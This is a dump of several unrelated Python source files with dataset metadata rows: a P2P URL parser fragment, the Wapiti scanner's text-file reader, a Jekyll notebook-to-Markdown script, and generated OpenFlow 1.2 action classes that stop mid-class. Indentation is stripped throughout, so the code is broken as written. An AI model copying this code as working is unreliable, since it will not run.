if authority.startswith('[') and csbidx != -1:
if csbidx == len(authority) - 1:
port = None
else:
port = authority[csbidx + 1:]
else:
cidx = authority.find(':')
if cidx != -1:
port = authority[cidx + 1:]
else:
port = None
if port is not None and not port.isdigit():
raise ValueError('Port not int')
if scheme != P2PURL_SCHEME:
raise ValueError('Unknown scheme ' + P2PURL_SCHEME)
metainfo = {}
if authority and path:
metainfo['announce'] = 'http://' + authority + path
result = urlparse.urlparse(metainfo['announce'])
if result[0] != 'http':
raise ValueError('Malformed tracker URL')
reqinfo = p2purl_parse_query(query)
metainfo.update(reqinfo)
swarmid = metainfo2swarmid(metainfo)
if DEBUG:
print >> sys.stderr, 'p2purl2metainfo: parsed', `metainfo`
return (metainfo, swarmid)
def metainfo2swarmid(metainfo):
if 'live' in metainfo['info']:
swarmid = pubkey2swarmid(metainfo['info']['live'])
else:
swarmid = metainfo['info']['root hash']
return swarmid
def p2purl_parse_query(query):
if DEBUG:
print >> sys.stderr, 'p2purl_parse_query: query', query
gotname = False
gotkey = False
gotrh = False
gotlen = False
gotps = False
gotam = False
gotbps = False
reqinfo = {}
reqinfo['info'] = {}
kvs = query.split('&')
for kv in kvs:
if '=' not in kv:
reqinfo['info']['name'] = p2purl_decode_name2utf8(kv)
reqinfo['encoding'] = 'UTF-8'
gotname = True
continue
k, v = kv.split('=')
if k == 'k' or k == 'a' and 'live' not in reqinfo['info']:
reqinfo['info']['live'] = {}
if k == 'n':
reqinfo['info']['name'] = p2purl_decode_name2utf8(v)
reqinfo['encoding'] = 'UTF-8'
gotname = True
elif k == 'r':
reqinfo['info']['root hash'] = p2purl_decode_base64url(v)
gotrh = True
elif k == 'k':
reqinfo['info']['live']['pubkey'] = p2purl_decode_base64url(v)
gotkey = True
elif k == 'l':
reqinfo['info']['length'] = p2purl_decode_nnumber(v)
gotlen = True
elif k == 's':
reqinfo['info']['piece length'] = p2purl_decode_piecelength(v)
gotps = True
elif k == 'a':
reqinfo['info']['live']['authmethod'] = v
gotam = True
elif k == 'b':
bitrate = p2purl_decode_nnumber(v)
reqinfo['azureus_properties'] = {}
reqinfo['azureus_properties']['Content'] = {}
reqinfo['azureus_properties']['Content']['Speed Bps'] = bitrate
gotbps = True
if not gotname:
raise ValueError('Missing name field')
if not gotrh and not gotkey:
raise ValueError('Missing root hash or live pub key field')
if gotrh and gotkey:
raise ValueError('Found both root hash and live pub key field')
if not gotlen:
raise ValueError('Missing length field')
if not gotps:
raise ValueError('Missing piece size field')
if gotkey and not gotam:
raise ValueError('Missing live authentication method field')
if gotrh and gotam:
raise ValueError('Inconsistent: root hash and live authentication method field')
if not gotbps:
raise ValueError('Missing bitrate field')
return reqinfo
def pubkey2swarmid(livedict):
if DEBUG:
print >> sys.stderr, 'pubkey2swarmid:', livedict.keys()
if livedict['authmethod'] == 'None':
return Rand.rand_bytes(20)
else:
return sha(livedict['pubkey']).digest()
def p2purl_decode_name2utf8(v):
if sys.platform != 'win32':
for c in v:
#if not curses.ascii.isascii(c):
# raise ValueError('Name contains unescaped 8-bit value ' + `c`)
pass
return urllib.unquote_plus(v)
def p2purl_encode_name2url(name, encoding):
if encoding.lower() == 'utf-8':
utf8name = name
else:
uname = unicode(name, encoding)
utf8name = uname.encode('utf-8')
return urllib.quote_plus(utf8name)
def p2purl_decode_base64url(v):
return b64urldecode(v)
def p2purl_decode_nnumber(s):
b = b64urldecode(s)
if len(b) == 2:
format = 'H'
elif len(b) == 4:
format = 'l'
else:
format = 'Q'
format = '!' + format
return unpack(format, b)[0]
def p2purl_encode_nnumber(s):
if type(s) == IntType:
if s < 65536:
format = 'H'
elif s < 4294967296L:
format = 'l'
else:
format = 'Q'
format = '!' + format
return b64urlencode(pack(format, s))
def p2purl_decode_piecelength(s):
return int(math.pow(2.0, float(s)))
def p2purl_encode_piecelength(s):
return str(int(math.log(float(s), 2.0)))
def b64urlencode(input):
output = b64encode(input)
output = output.rstrip('=')
output = output.replace('+', '-')
output = output.replace('/', '_')
return output
def b64urldecode(input):
inter = input[:]
padlen = 4 - (len(inter) - len(inter) / 4 * 4)
padstr = '=' * padlen
inter += padstr
inter = inter.replace('-', '+')
inter = inter.replace('_', '/')
output = b64decode(inter)
return output
|
apache-2.0
| -7,401,510,805,719,010,000
| 28.964029
| 88
| 0.560624
| false
| 3.550725
| false
| false
| false
|
teknolab/teknolab-wapiti
|
wapiti/file/auxtext.py
|
1
|
1712
|
#!/usr/bin/env python
# XML Report Generator Module for Wapiti Project
# Wapiti Project (http://wapiti.sourceforge.net)
#
# David del Pozo
# Alberto Pastor
# Copyright (C) 2008 Informatica Gesfor
# ICT Romulus (http://www.ict-romulus.eu)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
class AuxText:
"""Class for reading and writing in text files"""
def readLines(self,fileName):
"""returns a array"""
lines = []
f = None
try:
f = open(fileName)
for line in f:
cleanLine = line.strip(" \n")
if cleanLine != "":
lines.append(cleanLine.replace("\\0","\0"))
except IOError,e:
print e
#finally clause do not work with jyton
#finally:
#if f!=None:
#f.close()
return lines
#class
if __name__ == "__main__":
try:
l = AuxText()
ll = l.readLines("./config/execPayloads.txt")
for li in ll:
print li
except SystemExit:
pass
|
gpl-2.0
| -7,611,681,490,759,631,000
| 31.301887
| 76
| 0.626752
| false
| 3.9447
| false
| false
| false
|
liyangbit/liyangbit.github.io
|
_to-ipynb.py
|
1
|
4868
|
import os, re
import shutil
import csv
import datetime
# Main
thepath = os.getcwd()
ipynb_path = os.path.join(thepath, 'ipynb')
yaml_csv_path = os.path.join(ipynb_path, r'_post_head.csv')
today = datetime.datetime.today()
today = '{}-{:0>2d}-{:0>2d}'.format(today.year, today.month, today.day)
# Read head string from "_post_head.csv"
with open(yaml_csv_path, 'r', encoding="utf8") as f:
hasPost = False
for row in csv.reader(f):
if len(row) == 1: # First line is the default post name
fname = row[0]
continue
if fname == row[1]:
if not os.path.isfile(os.path.join(ipynb_path, '{}.ipynb'.format(fname))):
print('\n\tWarning: "{}.ipynb" doesn\'t exist.\n\n'.format(fname))
exit()
date = row[0]
updatestr = ""
headstr = '---\n'
headstr += 'layout: posts\n'
headstr += 'title: {}\n'.format(row[2])
# headstr += 'categories: {}\n'.format(row[3])
# if date != today:
# headstr += 'update: {}\n'.format(today)
# headstr += 'tags: {}\n---\n\n'.format(row[4])
headstr += '---\n\n'
hasPost = True
break
if not hasPost:
print('\n\tError: No record relevant to "{}" in csv file.\n\n'.format(fname))
exit()
ipynb_image_path = os.path.join(ipynb_path, r'{}_files'.format(fname))
destination_path = os.path.join(os.path.join(thepath, 'assets'), 'ipynb-images')
post_path = os.path.join(thepath, r'_posts/{}.md').format(date + '-' + fname)
# Convert ipynb to markdown
os.system('jupyter nbconvert --to markdown ipynb/{}.ipynb'.format(fname))
# Move it to "/_posts" and renameit
shutil.move(os.path.join(ipynb_path, '{}.md'.format(fname)), os.path.join(thepath, r'_posts/{}.md').format(fname))
if os.path.isfile(post_path):
os.remove(post_path)
os.rename(os.path.join(thepath, r'_posts/{}.md').format(fname), post_path)
# Move the images under "/ipynb/<fname>_files" to "/assets/ipynb-images"
def moveallfiles(origindir, destinationdir, filename):
if not os.path.exists(origindir):
return
# Delete all image files which contain "fname" in their filename
for file in os.listdir(destinationdir):
if file[:len(filename)] == filename:
os.remove(os.path.join(destinationdir, file))
for file in os.listdir(origindir):
originfile = os.path.join(origindir, file)
destinationfile = os.path.join(destinationdir, file)
# If it exists, then delete it and then conduct the movement
if os.path.isfile(destinationfile):
os.remove(destinationfile)
shutil.move(originfile, destinationfile)
# Delete the origin image path
shutil.rmtree(ipynb_image_path)
moveallfiles(ipynb_image_path, destination_path, fname)
with open(post_path, 'r', encoding='utf8') as f:
fstr = f.read()
# Replace the image link strings
fstr = re.compile(r'{}_files'.format(fname)).sub(r'https://liyangbit.github.io/assets/ipynb-images', fstr)
fstr = headstr + fstr
# Convert HTML table to markdown table
def transfertable(tablehtml):
tablehtml = re.compile(r'<table>').sub('', tablehtml)
tablehtml = re.compile(r'</tbody>[\n]</table>').sub('', tablehtml)
# Table head
tablehtml = re.compile(r'<tr><th>').sub(r'#', tablehtml)
tablehead = re.compile(r'<thead>[\S\s]*?</thead>').findall(tablehtml)
if tablehead:
tablehead = tablehead[0]
# Headline
col_num = len(re.compile(r'</th>').findall(tablehead))
tablehtml = re.compile(r'<tbody>').sub('|' + ' --- |' * col_num, tablehtml)
headcontent = re.compile(r'(?<=>)[\S]*?(?=</th>)').findall(tablehead)
newhead = '| ' + ' | '.join(headcontent) + ' |'
tablehtml = re.compile(tablehead).sub(newhead, tablehtml)
# First column
firstcol = re.compile(r'(?<=\s)<tr>[\S\s]*?<td>').findall(tablehtml)
for cell in firstcol:
origincell = cell
cell = re.compile(r'<tr><th[^>]*?>').sub('| **', cell)
cell = re.compile(r'</th><td>').sub('** | ', cell)
tablehtml = re.compile('\t' + origincell).sub(cell, tablehtml)
# Table body
tablehtml = re.compile(r'<tr><td>').sub('| ', tablehtml)
tablehtml = re.compile(r'</td></tr>').sub(' |', tablehtml)
tablehtml = re.compile(r'</th><td>').sub(' | ', tablehtml)
tablehtml = re.compile(r'</td><td>').sub(' | ', tablehtml)
# Final Check
tablehtml = re.compile(r'<tbody>').sub("", tablehtml)
return tablehtml
tablehtmllst = re.compile(r'<table>[\s\S]*?</table>').findall(fstr)
if tablehtmllst:
for table in tablehtmllst:
fstr = re.compile(table).sub(transfertable(table), fstr)
os.remove(post_path)
fstr = re.sub(r"\n{5,}", "\n", fstr)
with open(post_path, 'w', encoding='utf8') as f:
f.write(fstr)
|
mit
| 7,849,797,015,370,449,000
| 37.944
| 114
| 0.604766
| false
| 3.098663
| false
| false
| false
|
gzamboni/sdnResilience
|
loxi/of12/action.py
|
1
|
32027
|
# Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University
# Copyright (c) 2011, 2012 Open Networking Foundation
# Copyright (c) 2012, 2013 Big Switch Networks, Inc.
# See the file LICENSE.pyloxi which should have been included in the source distribution
# Automatically generated by LOXI from template module.py
# Do not modify
import struct
import loxi
import util
import loxi.generic_util
import sys
ofp = sys.modules['loxi.of12']
class action(loxi.OFObject):
subtypes = {}
def __init__(self, type=None):
if type != None:
self.type = type
else:
self.type = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 0)
subclass = action.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = action()
obj.type = reader.read("!H")[0]
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.type != other.type: return False
return True
def pretty_print(self, q):
q.text("action {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
class experimenter(action):
subtypes = {}
type = 65535
def __init__(self, experimenter=None, data=None):
if experimenter != None:
self.experimenter = experimenter
else:
self.experimenter = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed.append(loxi.generic_util.pad_to(8, length))
length += len(packed[-1])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 4)
subclass = experimenter.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = experimenter()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.experimenter = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.experimenter != other.experimenter: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("experimenter {")
with q.group():
with q.indent(2):
q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
action.subtypes[65535] = experimenter
class bsn(experimenter):
subtypes = {}
type = 65535
experimenter = 6035143
def __init__(self, subtype=None):
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 8)
subclass = bsn.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = bsn()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
obj.subtype = reader.read("!L")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("bsn {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
experimenter.subtypes[6035143] = bsn
class bsn_checksum(bsn):
type = 65535
experimenter = 6035143
subtype = 4
def __init__(self, checksum=None):
if checksum != None:
self.checksum = checksum
else:
self.checksum = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(util.pack_checksum_128(self.checksum))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_checksum()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 4)
obj.checksum = util.unpack_checksum_128(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.checksum != other.checksum: return False
return True
def pretty_print(self, q):
q.text("bsn_checksum {")
with q.group():
with q.indent(2):
q.breakable()
q.text("checksum = ");
q.pp(self.checksum)
q.breakable()
q.text('}')
bsn.subtypes[4] = bsn_checksum
class bsn_mirror(bsn):
type = 65535
experimenter = 6035143
subtype = 1
def __init__(self, dest_port=None, vlan_tag=None, copy_stage=None):
if dest_port != None:
self.dest_port = dest_port
else:
self.dest_port = 0
if vlan_tag != None:
self.vlan_tag = vlan_tag
else:
self.vlan_tag = 0
if copy_stage != None:
self.copy_stage = copy_stage
else:
self.copy_stage = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.dest_port))
packed.append(struct.pack("!L", self.vlan_tag))
packed.append(struct.pack("!B", self.copy_stage))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_mirror()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 1)
obj.dest_port = reader.read("!L")[0]
obj.vlan_tag = reader.read("!L")[0]
obj.copy_stage = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.dest_port != other.dest_port: return False
if self.vlan_tag != other.vlan_tag: return False
if self.copy_stage != other.copy_stage: return False
return True
def pretty_print(self, q):
q.text("bsn_mirror {")
with q.group():
with q.indent(2):
q.breakable()
q.text("dest_port = ");
q.text("%#x" % self.dest_port)
q.text(","); q.breakable()
q.text("vlan_tag = ");
q.text("%#x" % self.vlan_tag)
q.text(","); q.breakable()
q.text("copy_stage = ");
q.text("%#x" % self.copy_stage)
q.breakable()
q.text('}')
bsn.subtypes[1] = bsn_mirror
class bsn_set_tunnel_dst(bsn):
type = 65535
experimenter = 6035143
subtype = 2
def __init__(self, dst=None):
if dst != None:
self.dst = dst
else:
self.dst = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.dst))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_set_tunnel_dst()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 2)
obj.dst = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.dst != other.dst: return False
return True
def pretty_print(self, q):
q.text("bsn_set_tunnel_dst {")
with q.group():
with q.indent(2):
q.breakable()
q.text("dst = ");
q.text("%#x" % self.dst)
q.breakable()
q.text('}')
bsn.subtypes[2] = bsn_set_tunnel_dst
class copy_ttl_in(action):
type = 12
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = copy_ttl_in()
_type = reader.read("!H")[0]
assert(_type == 12)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("copy_ttl_in {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[12] = copy_ttl_in
class copy_ttl_out(action):
type = 11
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = copy_ttl_out()
_type = reader.read("!H")[0]
assert(_type == 11)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("copy_ttl_out {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[11] = copy_ttl_out
class dec_mpls_ttl(action):
type = 16
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = dec_mpls_ttl()
_type = reader.read("!H")[0]
assert(_type == 16)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("dec_mpls_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[16] = dec_mpls_ttl
class dec_nw_ttl(action):
type = 24
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = dec_nw_ttl()
_type = reader.read("!H")[0]
assert(_type == 24)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("dec_nw_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[24] = dec_nw_ttl
class group(action):
type = 22
def __init__(self, group_id=None):
if group_id != None:
self.group_id = group_id
else:
self.group_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.group_id))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = group()
_type = reader.read("!H")[0]
assert(_type == 22)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.group_id = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.group_id != other.group_id: return False
return True
def pretty_print(self, q):
q.text("group {")
with q.group():
with q.indent(2):
q.breakable()
q.text("group_id = ");
q.text("%#x" % self.group_id)
q.breakable()
q.text('}')
action.subtypes[22] = group
class nicira(experimenter):
subtypes = {}
type = 65535
experimenter = 8992
def __init__(self, subtype=None):
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!H", self.subtype))
packed.append('\x00' * 2)
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 8)
subclass = nicira.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = nicira()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
obj.subtype = reader.read("!H")[0]
reader.skip(2)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("nicira {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
experimenter.subtypes[8992] = nicira
class nicira_dec_ttl(nicira):
type = 65535
experimenter = 8992
subtype = 18
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!H", self.subtype))
packed.append('\x00' * 2)
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = nicira_dec_ttl()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
_subtype = reader.read("!H")[0]
assert(_subtype == 18)
reader.skip(2)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("nicira_dec_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
nicira.subtypes[18] = nicira_dec_ttl
class output(action):
type = 0
def __init__(self, port=None, max_len=None):
if port != None:
self.port = port
else:
self.port = 0
if max_len != None:
self.max_len = max_len
else:
self.max_len = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(util.pack_port_no(self.port))
packed.append(struct.pack("!H", self.max_len))
packed.append('\x00' * 6)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = output()
_type = reader.read("!H")[0]
assert(_type == 0)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.port = util.unpack_port_no(reader)
obj.max_len = reader.read("!H")[0]
reader.skip(6)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.port != other.port: return False
if self.max_len != other.max_len: return False
return True
def pretty_print(self, q):
q.text("output {")
with q.group():
with q.indent(2):
q.breakable()
q.text("port = ");
q.text(util.pretty_port(self.port))
q.text(","); q.breakable()
q.text("max_len = ");
q.text("%#x" % self.max_len)
q.breakable()
q.text('}')
action.subtypes[0] = output
class pop_mpls(action):
type = 20
def __init__(self, ethertype=None):
if ethertype != None:
self.ethertype = ethertype
else:
self.ethertype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!H", self.ethertype))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = pop_mpls()
_type = reader.read("!H")[0]
assert(_type == 20)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.ethertype = reader.read("!H")[0]
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.ethertype != other.ethertype: return False
return True
def pretty_print(self, q):
q.text("pop_mpls {")
with q.group():
with q.indent(2):
q.breakable()
q.text("ethertype = ");
q.text("%#x" % self.ethertype)
q.breakable()
q.text('}')
action.subtypes[20] = pop_mpls
class pop_vlan(action):
type = 18
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = pop_vlan()
_type = reader.read("!H")[0]
assert(_type == 18)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("pop_vlan {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[18] = pop_vlan
class push_mpls(action):
type = 19
def __init__(self, ethertype=None):
if ethertype != None:
self.ethertype = ethertype
else:
self.ethertype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!H", self.ethertype))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = push_mpls()
_type = reader.read("!H")[0]
assert(_type == 19)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.ethertype = reader.read("!H")[0]
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.ethertype != other.ethertype: return False
return True
def pretty_print(self, q):
q.text("push_mpls {")
with q.group():
with q.indent(2):
q.breakable()
q.text("ethertype = ");
q.text("%#x" % self.ethertype)
q.breakable()
q.text('}')
action.subtypes[19] = push_mpls
class push_vlan(action):
type = 17
def __init__(self, ethertype=None):
if ethertype != None:
self.ethertype = ethertype
else:
self.ethertype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!H", self.ethertype))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = push_vlan()
_type = reader.read("!H")[0]
assert(_type == 17)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.ethertype = reader.read("!H")[0]
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.ethertype != other.ethertype: return False
return True
def pretty_print(self, q):
q.text("push_vlan {")
with q.group():
with q.indent(2):
q.breakable()
q.text("ethertype = ");
q.text("%#x" % self.ethertype)
q.breakable()
q.text('}')
action.subtypes[17] = push_vlan
class set_field(action):
type = 25
def __init__(self, field=None):
if field != None:
self.field = field
else:
self.field = None
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(self.field.pack())
length = sum([len(x) for x in packed])
packed.append(loxi.generic_util.pad_to(8, length))
length += len(packed[-1])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_field()
_type = reader.read("!H")[0]
assert(_type == 25)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.field = ofp.oxm.oxm.unpack(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.field != other.field: return False
return True
def pretty_print(self, q):
q.text("set_field {")
with q.group():
with q.indent(2):
q.breakable()
q.text("field = ");
q.pp(self.field)
q.breakable()
q.text('}')
action.subtypes[25] = set_field
class set_mpls_ttl(action):
type = 15
def __init__(self, mpls_ttl=None):
if mpls_ttl != None:
